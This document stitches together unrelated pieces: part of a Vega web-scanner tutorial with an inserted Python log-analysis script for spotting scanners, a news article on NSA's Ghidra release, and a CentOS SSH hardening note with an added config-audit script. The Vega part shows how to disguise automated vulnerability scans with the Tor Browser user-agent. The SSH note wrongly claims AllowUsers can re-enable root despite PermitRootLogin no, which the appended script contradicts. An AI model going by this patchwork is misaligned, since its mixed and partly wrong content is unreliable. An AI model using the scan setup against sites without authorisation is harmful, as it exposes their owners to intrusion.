To modify the Vega user-agent, click on the "Scanner" category and enter the Tor Browser user-agent next to User-Agent. Then click "Apply" and "OK" to save the changes. Below is the current Tor Browser user-agent as of Feb. 2018.

Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0

The Tor Browser user-agent will change with every major Tor Browser update. To find the latest user-agent, open an up-to-date Tor Browser and enter about:config into the URL bar. If you see a warning popup, select "I accept the risk," then type useragent.override in the Search bar.

Double-clicking the entry that shows up will prompt a popup and allow you to copy the user-agent string. Alternatively, you can also right-click and select "Copy" on the value.

Moderate HTTP Requests (Optional)

Another thing in the Scanner menu you may want to modify is the Maximum number of requests per second to send option. By default, the software is set to 25 requests per second.

Depending on the scenario, this might be too many or too few requests per second. Assuming you have permission to scan a website with Vega, ten requests per second is probably a good place to start. With sites you own, 100 requests per second might be more appropriate. It's entirely up to you.

You won't notice much additional processing load from using more requests per second, so it's safe to set that number to something high. Don't worry; Vega isn't a DDoS tool. Your internet bandwidth and the bandwidth of the website will automatically throttle the requests.
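From the web server's side, a scan at these rates stands out clearly in the access log. As an added example that is not part of the original article, the Python script below parses combined-format access log lines (constructed sample lines are embedded) and flags clients whose peak per-second request rate reaches the 10 req/s figure suggested above, also noting whether the client sent the Tor Browser user-agent quoted earlier; the function names are my own.

```python
import re
from collections import Counter, defaultdict

# Apache/nginx "combined" log format; only the fields needed below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# The Tor Browser user-agent string quoted in the article (current as of Feb. 2018).
TOR_BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0"


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # "10/Feb/2018:14:03:21 +0000" -> bucket requests at one-second resolution
    rec["second"] = rec["ts"].split()[0]
    return rec


def summarize_clients(lines):
    """Per client IP: peak requests in any one second, distinct paths, 4xx count, Tor UA seen."""
    per_second = defaultdict(Counter)
    paths = defaultdict(set)
    client_errors = Counter()
    tor_ua = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip unparsable lines rather than guessing at their fields
        ip = rec["ip"]
        per_second[ip][rec["second"]] += 1
        paths[ip].add(rec["path"])
        if rec["status"].startswith("4"):
            client_errors[ip] += 1
        if rec["ua"] == TOR_BROWSER_UA:
            tor_ua.add(ip)
    return {ip: {"peak_rps": max(c.values()), "distinct_paths": len(paths[ip]),
                 "client_errors": client_errors[ip], "tor_browser_ua": ip in tor_ua}
            for ip, c in per_second.items()}


def flag_scanners(lines, rps_threshold=10):
    """IPs whose peak per-second rate reaches the threshold. 10 req/s is the article's
    suggested rate for an authorized scan; Vega's default of 25 is well above browsing."""
    summary = summarize_clients(lines)
    return sorted(ip for ip, s in summary.items() if s["peak_rps"] >= rps_threshold)


def sample_log():
    """Constructed sample: one client bursting 12 probes in one second, one normal visitor."""
    fmt = ('{ip} - - [10/Feb/2018:14:03:{sec} +0000] "GET {path} HTTP/1.1" '
           '{status} 512 "-" "{ua}"')
    browser = "Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0"
    lines = [fmt.format(ip="198.51.100.7", sec=21, path="/probe%d" % i, status=404,
                        ua=TOR_BROWSER_UA) for i in range(12)]
    lines.append(fmt.format(ip="203.0.113.5", sec=21, path="/index.html", status=200, ua=browser))
    lines.append(fmt.format(ip="203.0.113.5", sec=22, path="/about.html", status=200, ua=browser))
    return lines
```

Running `flag_scanners(sample_log())` returns only the bursting client; raising the threshold to 25 (Vega's default) returns nothing for this sample, which is why the rate setting matters to both sides.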

That's about it for Vega's preferences. The Listener settings in "Proxy" are preferences unrelated to the scanner. The "Debug" preferences in the Scanner section are there for Vega developers.

Step 4: Scan a Website with Vega

Now that we have Vega installed and configured, we're ready to start scanning a website. To start scanning, open the "Scan" menu in the top left and click on "Start New Scan." Vega will prompt us with the Select a Scan Target window. Enter your target URL into the box under Scan Target, then hit "Next."

Vega has dozens of modules designed to find a wide range of common web server vulnerabilities such as SQL, XSS, and XML injection vulnerabilities. If you want to enable all of the scanner modules, just make sure all are selected, and click "Finish" to start scanning the website. Otherwise, deselect the modules you're not interested in testing first.

Note: We don't need to adjust the Authentication Options or Parameters pages, which are the next two pages you would see if you kept selecting "Next," so we just select "Finish" after choosing our modules.

A scan can take anywhere from 2 minutes to 8 hours to complete depending on the size of the website and the requests per second we set earlier in the article. You'll know the scan has started when the website appears in the Scan Alerts tab and alerts begin to propagate. When the scan is done running, you'll get a report detailing any vulnerabilities found.

Step 5: Interpret Vega's Alerts

When the scan is complete, Vega will clearly and concisely display a summary of the alerts.

If Vega reports a "High" alert, don't panic. Vega's modules are sensitive and sometimes produce false positive alerts for vulnerabilities that may not actually exist. False positives aren't necessarily a bad thing. That being said, it's a good idea to comb through the report and manually investigate each alert. Think of these alerts as areas worth further investigating and not definitive indications that something needs to be fixed.

Vega does a fantastic job of explaining what each alert means, their impact on our websites, and ways to remedy the vulnerabilities. It also includes useful references that may help us better understand how to deal with the vulnerabilities.

Clicking on one of the alerts will display tons of useful information.

Vega Can Help Keep Your Website Secure

Vega is an excellent tool to help security researchers better understand web application penetration testing. Its vast selection of modules allows even novice users to dig deep into potential security risks and assess their severity to websites. Anyone interested in improving the security of their website and enhancing their web hacking skills will come to love Vega and its ease of use, or at least, I hope so.



https://itsfoss.com/nsa-ghidra-open-source/?fbclid=IwAR1NLFPSXtUQPJfodcCc9Rjs2LjpJaWq8O9svcVaAcZ09BV7AH5N20EvBSs

Ghidra – NSA’s reverse engineering tool is now available to the public for free.

NSA cybersecurity advisor Rob Joyce announced the public release at the RSA Conference 2019 in San Francisco.

Earlier, we had reported that the National Security Agency (NSA) was going to open source Ghidra. It was spotted from the senior NSA advisor, Robert Joyce’s session description on the official RSA conference website.

Here’s what it mentioned:

Image Credits: Twitter

In case the text in the image isn’t properly visible, let me quote the description here:

NSA has developed a software reverse engineering framework known as GHIDRA, which will be demonstrated for the first time at RSAC 2019. An interactive GUI capability enables reverse engineers to leverage an integrated set of features that run on a variety of platforms including Windows, Mac OS, and Linux and supports a variety of processor instruction sets. The GHIDRA platform includes all the features expected in high-end commercial tools, with new and expanded functionality NSA uniquely developed, and will be released for free public use at RSA.

The speculation has turned out to be true, as Ghidra is now available to the public.

What is Ghidra?

Ghidra is a software reverse engineering framework developed by NSA that the agency has been using for more than a decade.

Basically, a software reverse engineering tool helps you dig up the source code of a proprietary program, which in turn gives you the ability to detect virus threats or potential bugs. You should read how reverse engineering works to know more.

The tool is written in Java, and quite a few people have compared it to high-end commercial reverse engineering tools such as IDA.

A Reddit thread has a more detailed discussion, in which some ex-employees give a good amount of detail from before the tool became available.


Ghidra was a secret tool, how do we know about it?

The existence of the tool was uncovered in a series of leaks by WikiLeaks as part of Vault 7 documents of CIA.

Ghidra is open source

Yes, Ghidra is completely open source. It is released under the Apache License, version 2.0.

The source code of Ghidra is available on GitHub. You can browse the source code on its GitHub repository.

NSA is definitely targeting the open source community to help improve their tool while also reducing their effort to maintain this tool. This way the tool can remain free and the open source community can help improve GHIDRA as well.

If you want to contribute to the project, please read the guideline.

How to get Ghidra

Ghidra is a Java-based application and is available for Linux, Windows and macOS.

You can download it for free from its official website. It’s around 270MB in size.

There is no installation method for Ghidra. It's simply an executable, so all you need to do is extract the downloaded file and run it.

Since it is a Java application, make sure to install Java on Ubuntu or any other Linux distribution you are using.

Wrapping Up

NSA has a few good open source projects under its name. Not all of them garner praise, though, thanks to the not-so-good reputation of the security agency. Recently, the inclusion of NSA's Speck encryption algorithm in the Linux kernel created a huge controversy. It was removed from the kernel in a subsequent release.

A free and open source Ghidra would definitely help a lot of researchers and students and on the other side – the competitors will be forced to adjust their pricing.

What are your thoughts about it? Is it a good thing? What do you think about the tool going open source? Let us know what you think in the comments below.



[CentOS 7]
/etc/ssh/sshd_config

PermitRootLogin no

Apply this setting.

Controlling ssh access from a specific IP or network range is easy to do with TCP wrappers.

If you want to allow root login only from specific servers or IPs and block everything else, you can do it with the setting below.

/etc/ssh/sshd_config

AllowUsers root@<client hostname or IP> root@<client hostname or IP>

After configuring this, restart the sshd daemon and root login will be possible only from those IPs.

service sshd restart
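As an added example that is not part of the original post, the Python script below parses the global section of an sshd_config and reports how root access is constrained by the two directives used above. It also surfaces the caveat a reviewer would raise: sshd checks PermitRootLogin independently of AllowUsers, so with PermitRootLogin no the root@host entries never take effect. The function names and the embedded sample config are constructed, not part of OpenSSH.

```python
import re


def parse_sshd_config(text):
    """Return [(keyword, value)] for the global section of an sshd_config.
    Keywords are case-insensitive; everything after the first 'Match' line is
    conditional and deliberately left out of this check."""
    directives = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # "Key value" or "Key=value"
        keyword = parts[0].lower()
        if keyword == "match":
            break
        directives.append((keyword, parts[1].strip() if len(parts) > 1 else ""))
    return directives


def first_value(directives, keyword):
    """sshd honours the first occurrence of a keyword; later duplicates are ignored."""
    for k, v in directives:
        if k == keyword:
            return v
    return None


def audit_root_access(text):
    """Report how root login over SSH is constrained by PermitRootLogin and AllowUsers."""
    directives = parse_sshd_config(text)
    permit = first_value(directives, "permitrootlogin")
    allow = first_value(directives, "allowusers")
    patterns = allow.split() if allow else []
    # AllowUsers entries are USER or USER@HOST; only the root ones matter here
    root_patterns = [p for p in patterns if p.split("@", 1)[0] == "root"]
    findings = []
    if permit is not None and permit.lower() == "no":
        findings.append("root login disabled by PermitRootLogin no")
        if root_patterns:
            # PermitRootLogin is evaluated on its own, so AllowUsers root@host
            # cannot re-enable root from those hosts while it is set to no
            findings.append("conflict: AllowUsers lists root, but PermitRootLogin no still refuses root")
    else:
        if permit is None:
            findings.append("PermitRootLogin not set; the compiled-in default applies")
        if "root" in root_patterns:
            findings.append("AllowUsers permits root from any host")
        elif root_patterns:
            hosts = ", ".join(p.split("@", 1)[1] for p in root_patterns)
            findings.append("root restricted to hosts: " + hosts)
        elif patterns:
            findings.append("AllowUsers set without root; root cannot log in")
        else:
            findings.append("no AllowUsers restriction; root access governed by PermitRootLogin alone")
    return {"permit_root_login": permit, "root_allow_patterns": root_patterns, "findings": findings}


# Constructed sample combining the two directives from the post above (placeholder hosts)
SAMPLE_CONFIG = """\
PermitRootLogin no
AllowUsers root@203.0.113.10 root@admin.example.net
"""
```

`audit_root_access(SAMPLE_CONFIG)` reports the conflict; to get host-restricted root login, PermitRootLogin must allow root (for example with key-only login) while AllowUsers carries the root@host entries.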

